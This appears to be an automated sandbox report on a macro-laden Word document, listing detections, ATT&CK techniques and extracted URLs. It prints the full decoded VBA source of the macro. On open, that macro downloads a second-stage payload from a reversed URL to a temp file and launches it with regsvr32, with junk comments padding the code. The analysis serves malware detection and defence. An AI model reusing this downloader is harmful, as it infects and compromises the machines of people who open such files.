MALICIOUS
378
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1105 Ingress Tool Transfer
The sample contains VBA macros with an AutoOpen subroutine, indicating it is designed to execute automatically upon opening. The macros utilize URLDownloadToFile in conjunction with WScript.Shell.Exec to download and launch a second-stage payload from a remote source. This is a common technique for delivering malware.
Heuristics 9
-
ClamAV: Doc.Malware.Generic-7898874-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Malware.Generic-7898874-0
-
VBA project inside OOXML medium 6 related findings OOXML_VBADocument contains a VBA project — VBA macros present
-
URLDownloadToFile in VBA critical OLE_VBA_DOWNLOADURLDownloadToFile in VBAMatched line in script
#If VBA7 And Win64 Then Private Declare PtrSafe Function URLDownloadToFile Lib "urlmon" _ Alias "URLDownloadToFileA" ( _ -
LOLBin reference in VBA critical OLE_VBA_LOLBINLOLBin reference in VBAMatched line in script
' Regulatory bibliography ferry Call T.oP("regsvr32 " + HF) RW = Abs(58) -
VBA URLDownloadToFile reversed-LOLBin launcher critical OLE_VBA_URLDOWNLOAD_REVERSED_LOLBINVBA auto-exec macro downloads a payload with URLDownloadToFile and launches it through WScript.Shell.Exec using a reversed command string. This is a high-confidence downloader/launcher pattern, not an Office parser CVE.Matched line in script
#If VBA7 And Win64 Then Private Declare PtrSafe Function URLDownloadToFile Lib "urlmon" _ Alias "URLDownloadToFileA" ( _ -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
End Enum Sub AutoOpen() L = Abs(-76) -
Environ() call (env variable access) low OLE_VBA_ENVIRONEnviron() call (env variable access)Matched line in script
LA = Hex(335) zk = Environ(YJ) End Function -
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas Referenced by macro
- http://schemas.microsoft.com/office/drawing/2014/chartexReferenced by macro
- http://schemas.microsoft.com/office/drawing/2015/9/8/chartexReferenced by macro
- http://schemas.microsoft.com/office/drawing/2015/10/21/chartexReferenced by macro
- http://schemas.microsoft.com/office/drawing/2016/5/9/chartexReferenced by macro
- http://schemas.microsoft.com/office/drawing/2016/5/10/chartexReferenced by macro
- http://schemas.microsoft.com/office/drawing/2016/5/11/chartexReferenced by macro
- http://schemas.microsoft.com/office/drawing/2016/5/12/chartexReferenced by macro
- http://schemas.microsoft.com/office/drawing/2016/5/13/chartexReferenced by macro
- http://schemas.microsoft.com/office/drawing/2016/5/14/chartexReferenced by macro
- http://schemas.openxmlformats.org/markup-compatibility/2006Referenced by macro
- http://schemas.microsoft.com/office/drawing/2016/inkReferenced by macro
- http://schemas.microsoft.com/office/drawing/2017/model3dReferenced by macro
- http://schemas.openxmlformats.org/officeDocument/2006/relationshipsReferenced by macro
- http://schemas.openxmlformats.org/officeDocument/2006/mathReferenced by macro
- http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingReferenced by macro
- http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingReferenced by macro
- http://schemas.openxmlformats.org/wordprocessingml/2006/mainReferenced by macro
- http://schemas.microsoft.com/office/word/2010/wordmlReferenced by macro
- http://schemas.microsoft.com/office/word/2012/wordmlReferenced by macro
- http://schemas.microsoft.com/office/word/2016/wordml/cidReferenced by macro
- http://schemas.microsoft.com/office/word/2015/wordml/symexReferenced by macro
- http://schemas.microsoft.com/office/word/2010/wordprocessingGroupReferenced by macro
- http://schemas.microsoft.com/office/word/2010/wordprocessingInkReferenced by macro
- http://schemas.microsoft.com/office/word/2006/wordmlReferenced by macro
- http://schemas.microsoft.com/office/word/2010/wordprocessingShapeReferenced by macro
- http://www.w3.org/1999/02/22-rdf-syntax-ns#Referenced by macro
- http://ns.adobe.com/xap/1.0/Referenced by macro
- http://purl.org/dc/elements/1.1/Referenced by macro
- http://ns.adobe.com/xap/1.0/mm/Referenced by macro
- http://ns.adobe.com/xap/1.0/sType/ResourceEvent#Referenced by macro
- http://ns.adobe.com/xap/1.0/sType/ResourceRef#Referenced by macro
- http://ns.adobe.com/photoshop/1.0/Referenced by macro
- http://schemas.openxmlformats.org/officeDocument/2006/reReferenced by macro
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 4434 bytes |
SHA-256: e8d7253b5568325f8d16e04a4874874dc37888bdf72d61b06bb73e8e3bd6b46b |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "f5"
Function i(H)
Dim iX
iX = DateSerial(1999, 11, 7)
Dim S
S = DateSerial(2000, 5, 8)
End Function
Function r0()
' Occasionally caitiff synod plumage famous derbyshire
b9 = Hex(155)
' Religious
R = Abs(-55)
' Smock flop
iK = Fix(58)
' Amnesty vogue many
p0 = Abs(-9)
' Nine surpass
V = Fix(-35)
' However round
Dim aw
aw = DateSerial(2016, 12, 28)
' Derek trained
Yq = Fix(19)
' Wet understand spain
k = Abs(-59)
' Rely irremediable cat belarus gill
Dim E, dq
E = 4
dq = 4 / Cos(E)
' Agility elopement
yB = Abs(24)
' Her funk refresh
NS = Fix(77)
' Seventh nebula flash pall road deserve
' Canister repairs elfin offing
' Bowl communist serve houses
' Permission
N = Abs(16)
' Adaptation accruing hose inhale unalterable
B = Abs(-36)
' Dung circuits brooklyn bookseller
lZ = Fix(20)
' Suet usurper interpose laughingly troy unmerciful
Zd = Hex(84)
' Causation eighty-four reilly
J = Abs(-1)
' Disconsolate pegasus muck yearn
oJ = Hex(53)
' Rec privateer projectors
wh = Fix(-12)
' Congressional heraldic min
ZR = Abs(58)
' Docility pericles
LO = Abs(-45)
' Czechs orion mistakes repentant val
hB = Hex(216)
' Joyously erosion
Dim Jz
Jz = 4 * Atn(1)
' Ons
' Computed condensation
' Xenophon legate export mediocrity
End Function
Public Enum K6
Mo = 1
End Enum
Sub AutoOpen()
L = Abs(-76)
' Certainly cultural computational tangent
Dim an
an = 4 * Atn(1)
Dim vV
vV = DateSerial(2001, 9, 8)
' Principles arras
' Kathleen virile
yT = Fix(38)
qd = Abs(-59)
' Monaco egypt spotless ballet moose analyst
iW = Fix(-38)
' Decent
' Capitulation snout
' Contracts sluggard innovation inside illiteracy caribbean
Dim T As New fm
' Fealty derogatory holdings
Fr = Hex(333)
' Commander
HF = T.zk("tmp") & "\x.tmp"
Dim LJ
LJ = 4 * Atn(1)
Dim Px
Px = DateSerial(2000, 12, 20)
' March operate shops
Bf = Abs(-67)
' Forte estrangement improved
' Seas
' Wheres below bier
T.Z "bac.3opoh=l?php.p23i0oia/58ol02ew/moc.8ztd59l//:ptth", HF
BB = Abs(57)
' Wines great-grandfather socket gateway
Dim WV, OK
WV = 8
OK = 8 / Cos(WV)
Dim m
m = 4 * Atn(1)
' Beaches gut
Dim d4
d4 = 4 * Atn(1)
' Regulatory bibliography ferry
Call T.oP("regsvr32 " + HF)
RW = Abs(58)
' Galore ironic bric-a-brac spoonfuls
' H yea forty-one animals
' Sealing
' Freshman throwing array
vo = Abs(55)
' Dissertation linda
End Sub
Attribute VB_Name = "fm"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
#If VBA7 And Win64 Then
Private Declare PtrSafe Function URLDownloadToFile Lib "urlmon" _
Alias "URLDownloadToFileA" ( _
ByVal pCaller As LongPtr, _
ByVal szURL As String, _
ByVal szFileName As String, _
ByVal dwReserved As LongPtr, _
ByVal lpfnCB As LongPtr _
) As Long
#Else
Private Declare Function URLDownloadToFile Lib "urlmon" _
Alias "URLDownloadToFileA" ( _
ByVal pCaller As Long, _
ByVal szURL As String, _
ByVal szFileName As String, _
ByVal dwReserved As Long, _
ByVal lpfnCB As Long _
) As Long
#End If
Private Sub Class_Initialize()
Dim Fp
Fp = DateSerial(2012, 11, 19)
' Specialized expenditures
' Deprecate employed juvenile horses
' Reserved ancestry nassau quicksand powers
' Male paul economics mauve canny
End Sub
Private Sub Class_Terminate()
' Sunset anomaly blue pick
Q = Fix(53)
' Tingle donna hosiery
' Ana corp spectacular china guatemala
End Sub
Public Function Z(y, eH)
Bs = Fix(57)
' Channels stroke wanted given scissors
je = URLDownloadToFile(0&, StrReverse(y), eH, 0&, 0&)
End Function
Public Function zk(YJ)
kU = Abs(-58)
ko = Fix(66)
' Disagreed whirr testator physicist
LA = Hex(335)
zk = Environ(YJ)
End Function
Public Sub oP(eH)
' Borough dp spice twig richardson
Dim F3, IM
F3 = 7
IM = 7 / Cos(F3)
' Homesickness ohg.
' Protective stepfather node
bc = Fix(5)
' Expired radio
Dim rg As New WshShell
rg.exec eH
End Sub
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: word/vbaProject.bin | 25600 bytes |
SHA-256: 283039070de69a7e173c858274ac6e4f3a196ee738a9751505ef379f3b7cfab3 |
|||
|
Detection
ClamAV:
Doc.Malware.Generic-7898874-0
Obfuscation or payload:
unlikely
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.